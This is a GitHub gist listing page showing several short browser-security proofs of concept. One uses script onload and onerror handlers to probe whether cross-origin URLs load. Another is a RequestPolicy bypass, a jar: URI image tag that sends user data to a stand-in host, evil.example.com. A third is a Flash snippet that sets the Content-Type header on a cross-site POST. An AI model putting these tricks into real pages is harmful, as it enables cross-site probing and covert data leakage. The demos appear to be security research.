Skip to content

Instantly share code, notes, and snippets.

Avatar

Jordan Milne JordanMilne

  • Canada
View GitHub Profile
@JordanMilne
JordanMilne / cookie_jar_tests.json
Created Sep 14, 2015
Comparing the cookie parsing behaviours of various HTTP services
View cookie_jar_tests.json
@JordanMilne
JordanMilne / gist:6459317
Created Sep 6, 2013
Demonstrates abuse of script error handling
View gist:6459317
<html>
<body>
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
<script src="http://doesntexist.example.com" onload="javascript:alert('universe exploded')" onerror="javascript:alert('doesntexist failed to load as expected')"></script>
</body>
</html>
@JordanMilne
JordanMilne / gist:7704136
Created Nov 29, 2013
Demonstration of a RequestPolicy bypass using jar: URIs
View gist:7704136
<img src="jar:http://evil.example.com/logger?userdata=whatever!/foobar" />
View gist:8032399
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
@JordanMilne
JordanMilne / content-type.mxml
Created Jan 16, 2014
setting the Content-Type header with flash
View content-type.mxml
<?xml version="1.0"?>
<s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" xmlns:mx="library://ns.adobe.com/flex/mx" xmlns:s="library://ns.adobe.com/flex/spark" >
<fx:Script><![CDATA[
import flash.net.*;
public function sendStuff():void
{
var r:URLRequest = new URLRequest('http://www.youtube.com/foo');
r.method = 'POST';
r.data = '{wow what a great post body}';
View testing
aesKeyStringFOOBARBAZQUUXquuxy
aaaa
You can’t perform that action at this time.